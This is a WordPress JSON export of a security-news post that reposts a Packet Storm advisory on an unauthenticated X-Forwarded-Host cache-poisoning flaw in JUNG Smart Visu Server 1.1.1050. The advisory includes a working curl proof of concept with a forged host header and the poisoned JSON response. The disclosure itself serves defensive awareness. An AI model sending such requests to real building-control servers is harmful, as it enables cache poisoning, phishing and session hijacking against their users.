{"id":40637,"date":"2026-02-12T11:41:57","date_gmt":"2026-02-12T11:41:57","guid":{"rendered":"http:\/\/localhost\/?p=40637"},"modified":"2026-02-12T11:41:57","modified_gmt":"2026-02-12T11:41:57","slug":"jung-smart-visu-server-111050-request-url-override","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=40637","title":{"rendered":"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Request URL Override_PACKETSTORM:215522"},"content":{"rendered":"

{“lastseen”:”2026-02-12T17:20:22″,”description”:”JUNG Smart Visu Server version 1.1.1050 has a vulnerability that enables unauthenticated attackers to perform cache poisoning attacks by overriding the effective host in proxied requests through manipulation of the X-Forwarded-Host header. When a…”,”published”:”2026-02-12T00:00:00″,”modified”:”2026-02-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Request URL Override”,”source”:””,”references”:””,”id”:”PACKETSTORM:215522″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”JUNG Smart Visu Server 1.1.1050 Request URL Override\\n \\n \\n Vendor: ALBRECHT JUNG GMBH \\u0026 CO. KG\\n Product web page: https:\/\/www.jung-group.com | https:\/\/www.jung.de\\n Affected version: 1.1.1050\\n 1.0.905\\n 1.0.832\\n 1.0.830\\n \\n Summary: The Smart Visu Server makes your intelligent building\\n control convenient. With the user-friendly operating concept,\\n you can control both the KNX system and other systems such as\\n Philips Hue or Sonos on your mobile devices. You can likewise\\n connect voice control to your KNX system with Amazon Alexa or\\n Google Assistant via the Smart Visu Server.\\n \\n Desc: The vulnerability enables unauthenticated attackers to perform\\n cache poisoning attacks by overriding the effective host in proxied\\n requests through manipulation of the ‘X-Forwarded-Host’ header. When\\n a malicious actor sends a request with an arbitrary value, the backend\\n application or proxy fails to properly validate or sanitize this header,\\n resulting in the generation of responses that incorporate the injected\\n host as legitimate URLs or links, redirecting to the attacker’s controlled\\n domain. This can lead to persistent cache poisoning, where the tainted\\n content is stored and served to unsuspecting users, facilitating phishing,\\n session hijacking, or the distribution of malicious payloads.\\n \\n Tested on: Jetty(9.2.12.v20150709)\\n \\n \\n Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic\\n @zeroscience\\n \\n \\n Advisory ID: ZSL-2026-5970\\n Advisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2026-5970.php\\n \\n \\n 07.02.2026\\n \\n –\\n \\n \\n $ curl \\”http:\/\/10.0.0.16:8080\/rest\/items?2sdh5r6txj=1\\” \\\\\\n -H \\”User-Agent: thricer-engine\/1.6\\” \\\\\\n -H \\”X-Forwarded-Host: sillysec.com\\”\\n \\n HTTP\/1.1 200 OK\\n Content-Type: application\/json\\n Connection: close\\n \\n [{\\”link\\”:\\”http:\/\/sillysec.com\/rest\/items\/knxcom_action_2019829213754373\\”,\\”state\\”:\\”NULL\\”,\\”type\\”:\\”SwitchItem\\”,\\”name\\”:\\”knxcom_action_2019829213754373\\”,\\”label\\”:\\”Timer_ON\\”,\\”tags\\”:[\\”knxcommissioning\\”,\\”knxcom_action\\”,\\”{\\\\\\”knxcom_action\\\\\\”:\\\\\\”knxcom_action\\\\\\”,\\\\\\”actionType\\\\\\”:\\\\\\”time\\\\\\”,\\\\\\”function_states\\\\\\”:[{\\\\\\”function_name\\\\\\”:\\\\\\”knxcom_function_201817101939842\\\\\\”,\\\\\\”channel_states\\\\\\”:[{\\\\\\”channel_index\\\\\\”:0,\\\\\\”channel_commands\\\\\\”:{\\\\\\”OnOffType\\\\\\”:\\\\\\”ON\\\\\\”}}]},{\\\\\\”function_name\\\\\\”:\\\\\\”knxcom_function_2017919141856124\\\\\\”,\\\\\\”channel_states\\\\\\”:[{\\\\\\”channel_index\\\\\\”:0,\\\\\\”channel_commands\\\\\\”:{\\\\\\”OnOffType\\\\\\”:\\\\\\”ON\\\\\\”}}]},{\\\\\\”function_name\\\\\\”:\\\\\\”knxcom_function_2017919144055744\\\\\\”,\\\\\\”channel_states\\\\\\”:[{\\\\\\”channel_index\\\\\\”:0,\\\\\\”channel_commands\\\\\\”:{\\\\\\”OnOffType\\\\\\”:\\\\\\”ON\\\\\\”}}]}],\\\\\\”icon\\\\\\”:\\\\\\”schaltuhr\\\\\\”,\\\\\\”sortindex\\\\\\”:{\\\\\\”generic\\\\\\”:3},\\\\\\”timer\\\\\\”:{\\\\\\”time\\\\\\”:\\\\\\”16:0\\\\\\”,\\\\\\”weekdays\\\\\\”:{\\\\\\”1\\\\\\”:true,\\\\\\”2\\\\\\”:true,\\\\\\”3\\\\\\”:true,\\\\\\”4\\\\\\”:true,\\\\\\”5\\\\\\”:true,\\\\\\”6\\\\\\”:true,\\\\\\”7\\\\\\”:true}}}\\”],\\”groupNames\\”:[\\”knxcom_group_201982922375216\\”]},{\\”link\\”:\\n …\\n …”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215522″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215522\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-12T17:20:22″,”description”:”JUNG Smart Visu Server version 1.1.1050 has a vulnerability that enables unauthenticated attackers to perform cache poisoning attacks by overriding the effective host in proxied…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-40637","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Request URL Override_PACKETSTORM:215522 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=40637\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Request URL Override_PACKETSTORM:215522 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-12T17:20:22″,”description”:”JUNG Smart Visu Server version 1.1.1050 has a vulnerability that enables unauthenticated attackers to perform cache poisoning attacks by overriding the effective host in proxied...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=40637\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-12T11:41:57+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40637#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40637\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Request URL Override_PACKETSTORM:215522\",\"datePublished\":\"2026-02-12T11:41:57+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40637\"},\"wordCount\":510,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40637#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40637\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40637\",\"name\":\"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Request URL Override_PACKETSTORM:215522 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-12T11:41:57+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40637#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40637\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40637#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Request URL Override_PACKETSTORM:215522\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Request URL Override_PACKETSTORM:215522 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=40637","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Request URL Override_PACKETSTORM:215522 - zero redgem","og_description":"{“lastseen”:”2026-02-12T17:20:22″,”description”:”JUNG Smart Visu Server version 1.1.1050 has a vulnerability that enables unauthenticated attackers to perform cache poisoning attacks by overriding the effective host in proxied...","og_url":"https:\/\/zero.redgem.net\/?p=40637","og_site_name":"zero redgem","article_published_time":"2026-02-12T11:41:57+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=40637#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=40637"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Request URL Override_PACKETSTORM:215522","datePublished":"2026-02-12T11:41:57+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=40637"},"wordCount":510,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=40637#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=40637","url":"https:\/\/zero.redgem.net\/?p=40637","name":"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Request URL Override_PACKETSTORM:215522 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-12T11:41:57+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=40637#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=40637"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=40637#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 JUNG Smart Visu Server 1.1.1050 Request URL Override_PACKETSTORM:215522"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40637","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=40637"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40637\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=40637"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=40637"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=40637"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}